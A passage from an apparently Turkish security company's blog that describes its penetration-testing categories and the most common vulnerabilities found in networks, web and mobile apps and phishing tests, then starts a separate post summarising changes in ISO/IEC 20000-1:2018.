1.2. İÇ AĞ TESTLERİ</h4>
<div style="text-align: justify;">
<b>Sunucu ve İstemci Testleri</b></div>
<div style="text-align: justify;">
Yerel ağ üzerinde, kapsam dâhilinde tutulan istemci ve sunuculara yönelik gerçekleştirilen testlerdir. Bu kategoride hedef sistemler tespit edilir. Hedef sistemler üzerinde açık olan portlar ve bu portlar üzerinde çalışan servisler tespit edilir. Bu servislerin sürümleri ve mevcut sürümleri için zafiyetleri tespit edilir. Hatalı yapılandırma ve sürüm bazlı zafiyetler istismar edilerek saldırganların sistemlere verebileceği zararlar analiz edilir. Ele geçirilen sistemler aracılığı ile diğer sistemlere ve ağlara yönelik zafiyetler tespit edilir.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Kurum ağında bulunan farklı sunuculara yönelik farklı testler gerçekleştirilmektedir. Kapsam dâhilinde bulunan sunuculara yönelik ticari ve açık kaynak otomatize araçlar ile zafiyet analizinin yanında güvenlik ekibimizce geliştirilen araçlar ile de manuel testler gerçekleştirilmektedir.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>DNS Sunucu Testleri</b></div>
<div style="text-align: justify;">
Bir kurumun ağ yapısında, DNS sunucuları son derece önem taşımaktadır. IP adreslerinin kullanım zorluğunu ortadan kaldıran DNS sunucularında da çeşitli zafiyetler bulunabilmektedir.</div>
<div style="text-align: justify;">
Hatalı yapılandırılmış DNS sunucuları aracılığı ile kurum ağ yapısı hakkında bilgi toplamak mümkün olabilmektedir.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Bu test kategorisinde kullanıcıların farklı sistemlere istekleri dışında yönlendirilebilmelerine olanak verebilen zafiyetler gibi saldırganlara yetkisiz erişim izni oluşturabilecek zafiyetler test edilmektedir.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>E-mail Sunucu Testleri</b></div>
<div style="text-align: justify;">
Bu kategoride kapsam dâhilinde bulunan mail sunuculara yönelik testler gerçekleştirilmektedir. Son yıllarda kurumlara yönelik saldırıların önemli bir oranı mail sistemleri üzerinden son kullanıcıyı hedef alacak şekilde gerçekleştirilmektedir.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Hatalı veya eksik yapılandırılmış mail sunucu, saldırganların zararlı içerik gönderimine, yetkisiz mail gönderimine, güvenilir olmayan sistemlerden zararlı mail gönderimine vs. olanak sağlamaktadır.</div>
<div style="text-align: justify;">
Bu test kategorisinde mail sistemleri ticari araçlarla ve manuel yöntemlerle test edilmektedir. Mail sunucularının ve mail güvenlik sistemlerinin son kullanıcıları saldırılara karşı koruma yetenekleri test edilmektedir.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Veri Tabanı Güvenlik Testleri</b></div>
<div style="text-align: justify;">
Veri tabanı sistemleri bir kurumun en hassas sistemleridir. Veri tabanı sistemlerinde de yapılandırmaya, kullanılan sürümlere ve istemci olarak bağlanıp verileri yöneten sistemlere bağlı olarak zafiyetler bulunabilmektedir. Bu zafiyetler, saldırganların veri tabanına yetkisiz bir şekilde erişebilmesine, istemci ile sunucu arasındaki veri iletişimini değiştirebilmesine, veri tabanı sunucusunu ele geçirmesine sebep olabilmektedir.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Bu kategoride gerçekleştirilen testlerde veri tabanı sunucuları detaylı testlere tabi tutulmaktadır.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Ağ Cihazı Testleri</b></div>
<div style="text-align: justify;">
Bu kategoride kapsam dâhilinde tutulan ağ cihazlarına (switch, router vs.) yönelik zafiyet analizleri ve sızma testleri gerçekleştirilmektedir. Hatalı veya eksik yapılandırılmış ağ cihazlarında bulunan zafiyetlerin istismarı ile kullanıcılar gitmek istemedikleri sitelere yönlendirilebilir, şifreli trafikleri araya girilerek elde edilebilir.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>VoIP Teknolojisi Ürünleri Testleri</b></div>
<div style="text-align: justify;">
Kurum bünyesinde kullanılan VOIP sistemlerinde zafiyetler bulunabilmektedir. Hatalı veya eksik yapılandırılmış veya güncelleme eksiklikleri bulunan sistemlerin kullanılması ile saldırganlar kullanıcıların konuşmalarını kaydedip ortam dinlemesi gerçekleştirebilir, kullanıcılar adına sahte kimliklerle arama gerçekleştirebilir ve aradaki şifreli trafiği çözerek konuşma kayıtlarını elde edebilirler.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Buna benzer saldırılara karşı zafiyet analizleri için ticari ve açık kaynak yazılımlar ile otomatize ve manuel testler gerçekleştirilir.</div>
<div style="text-align: justify;">
<br /></div>
<h4 style="text-align: justify;">
1.3. KABLOSUZ AĞ TESTLERİ</h4>
<div style="text-align: justify;">
Kablosuz ağlara yönelik saldırılar ile kablosuz ağ parolasını elde etmek, kullanıcılara yönelik saldırılar gerçekleştirebilmek mümkündür. Hatalı veya eksik yapılandırılmış kablosuz ağlar üzerinden kuruma ait diğer ağlara da saldırılar gerçekleştirmek mümkün olabilmektedir. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Bu kategoride gerçekleştirilen güvenlik denetimlerde kurum tarafından kapsam dâhilinde tutulan kablosuz ağ sistemlerine yönelik sızma testleri gerçekleştirilmektedir.</div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
2. WEB UYGULAMA TESTLERİ</h3>
<div style="text-align: justify;">
Kurum tarafından belirli işlevleri yerine getirmek üzere yapılandırılmış web uygulamaları, dış ağ üzerinden herkes tarafından erişilebilir olduğu için güvenliğinin sağlanması son derece önemlidir. Bir web uygulaması üzerinde çalıştığı sunucunun ele geçirilmesine, bir sunucunun ele geçirilmesi tüm kurum sistemlerinin ele geçirilmesine olanak sağlayabilir.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Kurum Web uygulamalarına yönelik gerçekleştirilen testler OWASP yönergelerine uygun olarak gerçekleştirilmektedir. Web uygulamalarına farklı kullanıcı profilleri ile erişim sağlanabildiği için farklı profillerde güvenlik denetimleri gerçekleştirilmektedir.</div>
<div style="text-align: justify;">
Testlerin gerçekleştirildiği profiller aşağıda verilmiştir.</div>
<div style="text-align: justify;">
</div>
<ul>
<li><b>Anonim kullanıcı:</b> Bu kullanıcı profilinde kullanıcının hedef sistem üzerinde herhangi bir yetkisi bulunmamaktadır.</li>
<li><b>Yetkisiz kullanıcı:</b> Bu kullanıcı profili uygulama üzerinde sadece yetkisiz bazı işlemleri gerçekleştirebilen fakat uygulama üzerinde değişiklik gerçekleştiremeyen kullanıcı profilidir.</li>
<li><b>Yetkili kullanıcı:</b> Bu kullanıcı profili uygulama üzerinde bazı yetkili işlemleri gerçekleştirebilmektedir. Uygulamanın mimarisine göre birden fazla yetkili kullanıcı profilleri olabilmektedir. </li>
</ul>
<br />
<div style="text-align: justify;">
Uygulama güvenliği testlerinde yetkisiz kimselerin yetkili işlemleri gerçekleştirebilme girişimleri de canlandırılmaktadır. Yetkili bir kullanıcının gerçekleştirdiği tüm işlemler yetkisiz bir kullanıcı ile de gerçekleştirilmeye çalışılmaktadır. Bu tür yetki aşımı girişimlerine dikey yetki yükseltme girişimleri denilmektedir. Aynı şekilde yetkisiz bir kullanıcının başka bir kullanıcıya ait alanlara erişememesi gerekmektedir. Bu tür yetki aşımı girişimlerine ise yatay yetki aşımı girişimleri denilmektedir.</div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
3. MOBİL UYGULAMA TESTLERİ</h3>
<div style="text-align: justify;">
Kurumun mobil kullanıcılarına yönelik hazırladığı mobil uygulamalarda da çeşitli zafiyetler bulunabilmektedir. Mobil cihazlar için hazırlanan uygulamalar ve sunucu tarafında mobil uygulamalar için hazırlanan servislere yönelik gerçekleştirilen sızma testleri gerçekleştirilmektedir. OWASP yönergelerinin ve sızma testi ekibi tarafından hazırlanan kontrol listelerinin uygulandığı bu test kategorisinde tüm saldırı senaryoları test edilmektedir.</div>
<h3 style="text-align: justify;">
4. SOSYAL MÜHENDİSLİK TESTLERİ</h3>
<div style="text-align: justify;">
Bu güvenlik denetimleri kategorisinde testler direk olarak kurum çalışanlarına yönelik gerçekleştirilmektedir. Bir kurumun güvenlik zincirinin en hassas ve kırılgan noktasını çalışanlar oluşturmaktadır. Bu yüzden kurum çalışanların da güvenlik farkındalığının yüksek olması gerekmektedir. Çalışanların farkındalığını test etmek için kullanılan yöntemler, oltalama saldırıları ile çalışanlardan hassas bilgi elde etme yöntemleridir.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Oltalama yöntemleri olarak telefon yoluyla ya da mail yoluyla testler gerçekleştirilmektedir. Kurum tarafından gerçekleştirilen isteğe bağlı olarak testler mail yoluyla, telefon yoluyla veya her ikisiyle gerçekleştirilmektedir.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Testler personellerden, hassas bilgileri elde etmek için hazırlanmış sahte senaryolarla gerçekleştirilmektedir. Senaryolar personellerin sık kullandığı sistemlere benzetilerek ve çalışanları endişeye sevk edecek şekilde hazırlanmaktadır.</div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
5. DoS & DDoS SERVİS SONLANDIRMA TESTLERİ</h3>
<div style="text-align: justify;">
Kurum sistemlerinin dışarıdan erişilebilmesi için yapılandırılan servisler, sunucuların ve ağ yapısının sınırlarından ve hatalı yapılandırılmalarından dolayı hizmet veremez hale getirilebilmektedir. Bu test kategorisinden kurum dış ağı üzerinden çok yoğun oranlarda isteklerde bulunarak sistemlerin hizmet veremez hale geldiği eşik değerleri tespit edilmektedir.</div>
<div style="text-align: justify;">
</div>
<ul>
<li><b>TCP SYN FLOOD:</b> Hedef sistemlere TCP -SYN bayrağı seçilmiş paketlerin gönderilerek, hedef sistemlerinin kaynağını tüketip masum isteklere cevap veremez hale getirilmesidir.</li>
<li><b>TCP ACK FLOOD:</b> Hedef sistemlere TCP-ACK bayrağı seçilmiş paketlerin gönderilerek, hedef sistemlerin masum isteklere cevap veremez hale getirilmesidir.</li>
<li><b>MIXED FLAG FLOOD:</b> Hedef sistemlere birden fazla TCP bayrağının seçilmiş paketlerin gönderildiği saldırı çeşididir. Bu saldırılarda uygulamalar önünde konumlandırılan sistemlerin kaynaklarının tüketilmesi hedeflenmektedir.</li>
<li><b>ICMP FLOOD:</b> Hedef sistemlere ICMP paketlerinin gönderilerek hedef sistemlerin diğer masum isteklere cevap veremez hale getirilmesidir.</li>
<li><b>UDP FLOOD:</b> Hedef DNS sunucu sistemlerine yapısı değiştirilmiş paketlerinin gönderilerek, hedef sistemlerin DNS isteklerine cevap veremez hale getirilmesidir.</li>
<li><b>DNS FLOOD:</b> Hedef DNS sunucu sistemlerine yönelik aşırı miktarda DNS isteklerinin gerçekleştirilerek, sistemlerin diğer masum DNS isteklerine cevap verilemez hale getirilmesidir.</li>
<li><b>HTTP GET FLOOD:</b> Hedef web uygulamalarına yönelik HTTP-GET istekleri ile sistemlerin uygulamaların cevap veremez hale getirilmesidir.</li>
<li><b>HTTP POST FLOOD:</b> Hedef web uygulamalarına yönelik HTTP-POST istekleri ile sistemlerin uygulamaların cevap veremez hale getirilmesidir.</li>
</ul>
<br />
<br />
<h3 style="text-align: justify;">
6. En Çok Karşılaşılan Açıklıklar</h3>
<div style="text-align: justify;">
Yapılan testlerde elde ettiğimiz verilere göre <b>Ağ ve Sistem Altyapıları</b>nda en çok rastlanan beş bulgunun dağılımı aşağıdaki gibidir.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-zLoQ34QirwU/XFl8JSBwTSI/AAAAAAAAAWQ/qeHSxr8ToN8gbn96wKOlDFDHNYOIcdY1ACLcBGAs/s1600/grafik1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="299" data-original-width="555" src="https://3.bp.blogspot.com/-zLoQ34QirwU/XFl8JSBwTSI/AAAAAAAAAWQ/qeHSxr8ToN8gbn96wKOlDFDHNYOIcdY1ACLcBGAs/s1600/grafik1.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
Grafik 1 Ağ ve Sistem Altyapıları</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: justify;">
</div>
<ul>
<li>MS17-010 güvenlik bülteni ile yayınlanan SMBv1 üzerine gönderilen bazı isteklerin yanlış değerlendirilmesi sonucu özel paketler ile yetkisiz bir biçimde uzaktan kod çalıştırılması durumu ortaya çıkmaktadır. Saldırganlar ağda bulunan SMBv1 koşturan Windows işletim sistemlerini hedef alarak özel hazırlanmış paketleri ilettiğinde uzak sunuculara ve istemcilere erişim sağlayabilirler. Bu durumda uzaktan komut çalıştırılabilir ve akabinde bilgi ifşası yaşanabilmektedir.</li>
<li>SNMP (Simple Network Management Protocol) servisi, önceden belirlenmiş sistem bilgilerine uzaktan erişebilmeyi sağlayan bir yönetim servisidir. SNMP servisi versiyon 3 öncesi kullanımlarda, sistem bilgilerine erişimde sadece bir topluluk ismi kullanmaktadır. SNMP servisi topluluk isminin kuruma özel kullanmak yerine ön tanımlı olarak (public, private, cisco) kullanılması yetkisiz kimselerin sistem hakkında bilgi toplamasına imkan sağlamaktadır.</li>
<li>Telnet, cihazların uzaktan yönetimi için kullanılan bir protokoldür. Telnet protokolü ile gerçekleştirilen bağlantılar ağ üzerinden şifrelenmeden gerçekleştirilmektedir. Aynı ağda bulunan saldırganlar tarafından oturum bilgilerinin dahil tüm trafiğin elde edilmesi mümkündür.</li>
<li>Anonim kullanıcı için tanımlanan FTP hizmetinde kullanıcılar sadece “anonymous” kullanıcı adı ile parola kullanmaksızın dosya transferi gerçekleştirebilmektedirler. Bu zafiyetin saldırganlar tarafından istismarı ile dosya sunucu üzerinde bulunan verilerin ifşası ve sunucuya zararlı yazılım yüklenmesi gerçekleşebilir.</li>
<li>Dropbear çoklu güvenlik zafiyetleri sömürülerek; kullanıcı adı ve parola tanımlamasında kaynaklanan bir metin formatı zafiyeti sebebiyle, giriş yapmamış bir kullanıcı sistem üzerinde root hakları ile komut çalıştırabilir. Ek olarak OpenSSH anahtar dosyalarının yönetiminden kaynaklanan bir zafiyet sebebiyle, sistemde giriş yapmamış bir saldırgan uzak komut çalıştırabilir. </li>
</ul>
Yapılan testlerde elde ettiğimiz verilere göre<b> Web Uygulamaları</b>nda en çok rastlanan beş bulgunun dağılımı aşağıdaki gibidir.<br />
<br />
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-LLTYr8ixY_4/XFl8myhgkuI/AAAAAAAAAWY/9iDMP5QCZo0kWqdiuhB_4mGgP0KDFtSmgCLcBGAs/s1600/grafik2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="241" data-original-width="551" src="https://1.bp.blogspot.com/-LLTYr8ixY_4/XFl8myhgkuI/AAAAAAAAAWY/9iDMP5QCZo0kWqdiuhB_4mGgP0KDFtSmgCLcBGAs/s1600/grafik2.png" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: center;">
Grafik 2 Web Uygulamaları</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: justify;">
</div>
<ul>
<li>Web uygulamalar geliştiriliyorken güvenliğin sağlanması adına bazı önlemlerin alınmış olması önemlidir. Örneğin HTTPOnly bayrağı işaretlenmemiş çerezlerin kullanımı sonucu, son kullanıcılara yönelik gerçekleştirilebilecek XSS saldırıları ile geçerli oturum bilgiler elde edilebilmektedir. Çerezlere güvenli bayrağı (Secure) atandığında, tüm çerez bilgileri SSL protokolü ile gönderilmeye zorlanır. Güvenli bayrağı atanmamış çerezler, araya girme saldırıları (man in the middle attack-MITM) sonrasında önemli bilgilerin ifşası söz konusu olabilmektedir.</li>
<li>Web uygulamalar geliştiriliyorken kullanılan JavaScript veya jQuery kütüphanelerinin güncel olması web uygulamanın güvenliği için yüksek önem taşımaktadır. Güncel olmayan sürümlerde uzaktan komut çalıştırmaya varan ciddi zafiyetler oluşabilmektedir. </li>
<li>Web uygulamaların CAPTCHA kullanılmayan kimlik doğrulama panelleri, kaba kuvvet (brute force) saldırılarına karşı savunmasızdırlar. Saldırganlar bu zafiyeti istismar ederek geçerli hesap bilgilerine erişebilmeyi başarabilirler.</li>
<li>Web uygulamalarda bazı hassas bilgilerin (kullanıcı adı, parola vs.) şifresiz kanallar aracılığı ile iletilmesi sistemi kullanan kişiler için zafiyet arz etmektedir. Saldırganların başarılı bir araya girme saldırısı (man in the middle attack-MITM) ile bu hassas bilgilerin elde edilebileceğine dikkat edilmelidir.</li>
<li>Web uygulamada bulunan formları otomatik olarak gönderilmesi zafiyet oluşturabilmektedir. Proxy sunucu ile araya giren saldırgan, sistem üzerinde sonsuz kayıt oluşturabilir. Bu da veri tabanının kayıt limitinin aşılarak devre dışı kalmasına sebep olabilir. Sistemin veri bütünlüğünü bozarak işlevsiz hale gelmesine sebep olabilmektedir.</li>
</ul>
<br />
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
Yapılan testlerde elde ettiğimiz verilere göre <b>Mobil Uygulamaları</b>nda en çok rastlanan beş bulgunun dağılımı aşağıdaki gibidir.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-RAAXU3dBaow/XFl9I9QxwhI/AAAAAAAAAWg/l6lN6taqiuADT44gh7Pcxfd4OQhG2YmqgCLcBGAs/s1600/grafik3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="268" data-original-width="585" src="https://4.bp.blogspot.com/-RAAXU3dBaow/XFl9I9QxwhI/AAAAAAAAAWg/l6lN6taqiuADT44gh7Pcxfd4OQhG2YmqgCLcBGAs/s1600/grafik3.png" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: center;">
Grafik 3 Mobil Uygulamaları</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: justify;">
</div>
<ul>
<li>Jailbreak/root yapılmış cihazlarda zararlı yazılım olma ihtimali jailbreak/root yapılmamış cihazlara göre çok daha yüksektir. Bu sebepten ötürü uygulamalar Jailbreak/root yapılmış bir cihaz üzerinde çalışıyorsa kullanıcının bu durumunun riski hakkında bilgilendirilmesi önerilmektedir.</li>
<li>SSL Pinning yapılmadığı durumlarda saldırgan, cihaza kendi oluşturduğu SSL sertifikasını yükleyerek sunucu ile istemci arasındaki trafiği çözebilmektedir. Bu zafiyet yazılımın kendine yapılan isteklerde beklediği geçerli SSL sertifikasını tanımamasından ve saldırgan tarafından oluşturulmuş sertifikayı kabul etmesinden kaynaklanmaktadır.</li>
<li>Uygulamaların "Log" dosyalarında hassas veri barındırması durumunda zafiyet oluşmaktadır. Cihaza fiziksel veya uzaktan erişen saldırgan log dosyalarını inceleyerek son kullanıcıya ait hassas verilere erişebilecektir. Ele geçirdiği bu hassas veriler ile uygulamaya giriş yapabilecektir.</li>
<li>Cihaz içerisindeki SQLite dosyalarında uygulamaya ait hassas veriler depolandığı noktalarda zafiyet oluşmaktadır. Cihaza fiziksel veya uzaktan erişim sağlayabilecek saldırgan bu bilgiler sayesinde hassas ve kişisel bilgilere ulaşabilmektedir. </li>
<li>Uygulama kaynak kodu okunabilir şekilde geri dönüştürüldüğünde uygulamanın iç işleyişi ile ilgili bilgiler saldırgan tarafından elde edilebilmekte ve uygulamanın analizi kolaylaşmaktadır.</li>
</ul>
<br />
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
Yapılan testlerde elde ettiğimiz verilere göre <b>Sosyal Mühendislik Testleri</b>nde başarı dağılımı aşağıdaki gibidir. Sonuçlar mail ile oltalama saldırısının benzer senaryolar ile uygulanması ile elde edilmiştir.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-wQvxa142Rpk/XFl9ZoWdfTI/AAAAAAAAAWo/uXkgIx0hqtgPivjx9rBRcHhD9reQRNC1wCLcBGAs/s1600/grafik4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="288" data-original-width="590" src="https://3.bp.blogspot.com/-wQvxa142Rpk/XFl9ZoWdfTI/AAAAAAAAAWo/uXkgIx0hqtgPivjx9rBRcHhD9reQRNC1wCLcBGAs/s1600/grafik4.png" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: center;">
Grafik 4 Şüpheli Bağlantıya Tıklama Oranları</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: justify;">
Grafikten de anlaşıldığı üzere test yapılan kullanıcıların yarısından fazlası ilgi çekici içeriğe aldanarak açma eğilimindedir. Saldırganlar insani zafiyetlerden faydalanarak sistemler üzerinde erişim sağlayabilirler. Bu da bilgi teknolojileri sistemlerini risk altında bırakmaktadır. </div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-JLCIxnIK1sY/XFl9nFR5l-I/AAAAAAAAAWs/fIYPgfPzlic17gvDIjHfiJH-w9txzpFVwCLcBGAs/s1600/grafik5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="288" data-original-width="590" src="https://3.bp.blogspot.com/-JLCIxnIK1sY/XFl9nFR5l-I/AAAAAAAAAWs/fIYPgfPzlic17gvDIjHfiJH-w9txzpFVwCLcBGAs/s1600/grafik5.png" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: center;">
Grafik 5 Şüpheli Bağlantıdan Açılan Formu Doldurma Oranları</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: justify;">
İkinci grafik ise ilk grafikte şüpheli linke tıklayan kullanıcıların önüne gelen formda kişisel bilgileri talep edilmektedir. Burada kullanıcıların %60 gibi ciddi bir çoğunluğu kişisel bilgilerini veri toplayanın kaynağına dikkat etmeden paylaşmışlardır. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Bu tarz saldırıların önüne geçebilmek adına alınabilecek en iyi önlem kurum çalışanlarını konu hakkında bilinçlendirmek için farkındalık eğitimleri verilmesidir.</div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
7. Sonuç</h3>
<div style="text-align: justify;">
Kurumların bilgi teknolojileri sistemlerinin dış dünyaya karşı durumunu öğrenebilmeleri ve açıklıklara karşı önlem alabilmeleri için periyodik olarak sızma testi yaptırmaları önerilmektedir. Ancak bu süreçte sadece sızma testi yeterli olmayabilir. Dış dünyaya karşı hazırlıklı olmak için gelen güncelleme ve düzeltmelerin takibi, sistemlerin bakımı ve kullanılmayan servislerin kapatılması güvenli kalabilmek adına büyük önem taşımaktadır.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Sistemler ne kadar güvenli olsa da bilgi güvenliğinin en zayıf halkası olan insani zafiyetler unutulmamalı, çalışanlara belli periyotlarda farkındalık eğitimi verilmelidir.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Siz de güvenli kalabilmek adına ilk adım olarak paylaştığımız en çok karşılaşılan açıklıkların sistemlerinizde bulunup bulunmadığını kontrol edebilirsiniz.<br />
<br />
<a href="http://www.btyon.com.tr/sizma-testi.php" target="_blank"><span style="background-color: white; font-family: arial, helvetica, sans-serif;"> S</span>ızma testi</a><span style="background-color: white; font-family: arial, helvetica, sans-serif;"><a href="http://www.btyon.com.tr/sizma-testi.php" target="_blank"> </a>( </span><a href="http://www.btyon.com.tr/penetrasyon-testi.php" style="font-family: arial, helvetica, sans-serif;" target="_blank">Penetrasyon testi</a><span style="background-color: white; font-family: arial, helvetica, sans-serif;">) hizmetlerimiz hakkında detaylı bilgi almak için </span><a href="http://www.btyon.com.tr/pentest.php" style="font-family: arial, helvetica, sans-serif;" target="_blank">tıklayınız</a><span style="background-color: white; font-family: arial, helvetica, sans-serif;">. </span></div>
<div style="text-align: justify;">
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2815426134653926766.post-56630400698054176892018-09-23T17:56:00.002+03:002018-09-23T17:56:44.622+03:00Yeni Sürüm ISO/IEC 20000-1 yayınlandı. ISO/IEC 20000-1:2011 ve ISO/IEC 20000-1:2018 standardı karşılaştırması aşağıdadır. <br />
<div class="MsoNormal">
<span style="font-size: 12.0pt; line-height: 107%;">En son 2011
yılında yayınlanan ISO/IEC 20000-1 Bilgi Teknolojileri Servis Yönetim Sistemi
gereklilikler standardının yeni sürümü Eylül 2018 ayında yayınlandı. Ülkemizde
23 kuruluşun<sup>1</sup> akredite olarak sahip olduğu bilgi teknolojileri
servis yönetim sistemi standardı ile ilgili ana değişiklikler aşağıda
özetlemiştir.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-size: 12.0pt; line-height: 107%;"><br /></span></div>
<ul style="margin-top: 0cm;" type="disc">
<li class="MsoNormal" style="mso-list: l1 level1 lfo1;"><span style="font-size: 12.0pt; line-height: 107%;">ISO tarafından tüm yönetim sistemleri için
kullanılan üst seviye yapıya (Annex SL) uyumlu hale getirilmiştir. Bu
güncelleme organizasyonun içeriği, hedefleri gerçekleştirmek için
planlama, risk ve fırsatları belirlemek için faaliyetler gibi yeni
zorunluluklar getirmiştir. <o:p></o:p></span></li>
<li class="MsoNormal" style="mso-list: l1 level1 lfo1;"><span style="font-size: 12.0pt; line-height: 107%;">Servis yönetimi alanındaki trendleri dikkate
alarak güncellemeler gerçekleştirilmiştir. Örneğin bir çok tedarikçinin
yönetilerek tek elden servis entegratörü olarak hizmet verme yaklaşımı,
servislerin tercih edilmesinde tek kriterin fiyat olması (emtialaşma) yaklaşımı,
sunulan servislerin değerinin belirlenmesi vb. <o:p></o:p></span></li>
<li class="MsoNormal" style="mso-list: l1 level1 lfo1;"><span style="font-size: 12.0pt; line-height: 107%;">Bazı bağlayıcı gereklilikler (örneğin kapasite
planı) standarttan çıkarılmıştır. Bu sayede işletmelere gereklilikleri
sağlamak için esneklik sağlanmıştır. İşletmeler gereklilikleri sağlamak
için ne yapılması gerektiği konusunda özgür bırakılmıştır.<o:p></o:p></span></li>
<li class="MsoNormal" style="mso-list: l1 level1 lfo1;"><span style="font-size: 12.0pt; line-height: 107%;">Bilgi birikimi (knowlegde) ve servislerin
planlanmasına yönelik yeni gereklilikler tanımlanmıştır. <o:p></o:p></span></li>
<li class="MsoNormal" style="mso-list: l1 level1 lfo1;"><span style="font-size: 12.0pt; line-height: 107%;">Daha önce bir arada ele alınan bazı konular
parçalanmıştır. <o:p></o:p></span></li>
<ul style="margin-top: 0cm;" type="circle">
<li class="MsoNormal" style="mso-list: l1 level2 lfo1;"><span style="font-size: 12.0pt; line-height: 107%;">Olay ve istek yönetimi, olay yönetimi ve istek yönetimi
olarak, <o:p></o:p></span></li>
<li class="MsoNormal" style="mso-list: l1 level2 lfo1;"><span style="font-size: 12.0pt; line-height: 107%;">Servis sürekliliği ve erişebilirlik yönetimi,
servis sürekliliği ve servis erişebilirliği olarak,<o:p></o:p></span></li>
<li class="MsoNormal" style="mso-list: l1 level2 lfo1;"><span style="font-size: 12.0pt; line-height: 107%;">Servis seviyesi yönetimi, servis seviyesi ve
katalog yönetimi olarak,<o:p></o:p></span></li>
<li class="MsoNormal" style="mso-list: l1 level2 lfo1;"><span style="font-size: 12.0pt; line-height: 107%;">Kapasite yönetimi, kapasite yönetimi ve talep
yönetimi olarak ikiye bölünmüştür.<o:p></o:p></span></li>
</ul>
<li class="MsoNormal" style="mso-list: l1 level1 lfo1;"><span style="font-size: 12.0pt; line-height: 107%;">“Diğer taraflarca işletilen süreçlerin yönetişimi”
maddesi “Servis yaşam döngüsünde yer alan tarafların kontrol edilmesi”
olarak yeniden adlandırılmıştır. <o:p></o:p></span></li>
<li class="MsoNormal" style="mso-list: l1 level1 lfo1;"><span style="font-size: 12.0pt; line-height: 107%;">Standartta yer alan tüm servislerin veya
süreçlerin bir başka kuruluş tarafından gerçekleştirilmesi halinde
standarda uyumluluk iddia edilemeyeceği eklenmiştir. <o:p></o:p></span></li>
<li class="MsoNormal" style="mso-list: l1 level1 lfo1;"><span style="font-size: 12.0pt; line-height: 107%;">Terim ve tarifler kısmı yönetim sistemi terimleri
ve servis yönetimi terimleri olarak ikiye ayrılmıştır. <o:p></o:p></span></li>
<ul style="margin-top: 0cm;" type="circle">
<li class="MsoNormal" style="mso-list: l1 level2 lfo1;"><span style="font-size: 12.0pt; line-height: 107%;">Üst seviye yapıya uyumlu olmak için yeni
terimler eklenmiştir.<o:p></o:p></span></li>
<li class="MsoNormal" style="mso-list: l1 level2 lfo1;"><span style="font-size: 12.0pt; line-height: 107%;">Servis sağlayıcı terimi kuruluş olarak yeniden
adlandırılmıştır.<o:p></o:p></span></li>
<li class="MsoNormal" style="mso-list: l1 level2 lfo1;"><span style="font-size: 12.0pt; line-height: 107%;">İç grup terimi iç tedarikçi, tedarikçi terimi
dış tedarikçi olarak yeniden adlandırılmıştır. <o:p></o:p></span></li>
<li class="MsoNormal" style="mso-list: l1 level2 lfo1;"><span style="font-size: 12.0pt; line-height: 107%;">Bilgi güvenliği tanımı ISO/IEC 27000 ile uyumlu
olmak için tekrar tanımlanmıştır. Erişebilirlik kavramı bilgi
güvenliğinde yer alan erişebilirlik ile karışmaması için servis
erişebilirliği olarak yeniden düzenlenmiştir. <o:p></o:p></span></li>
</ul>
